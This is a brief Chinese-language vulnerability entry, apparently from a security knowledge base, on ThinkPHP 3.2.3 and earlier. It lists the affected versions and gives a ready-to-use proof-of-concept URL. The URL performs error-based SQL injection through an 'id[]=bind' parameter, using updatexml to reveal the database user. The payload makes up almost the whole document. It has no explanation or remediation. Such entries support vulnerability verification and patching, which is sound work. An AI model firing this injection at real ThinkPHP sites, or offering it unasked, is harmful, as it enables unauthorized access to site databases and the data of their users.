Thinkphp 影响范围¶ Thinkphp <= 3.2.3 漏洞验证POC¶ /index.php/home/user?money[]=1123&user=liao&id[0]=bind&id[1]=0%20and%20(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) 最后更新: 2023-10-12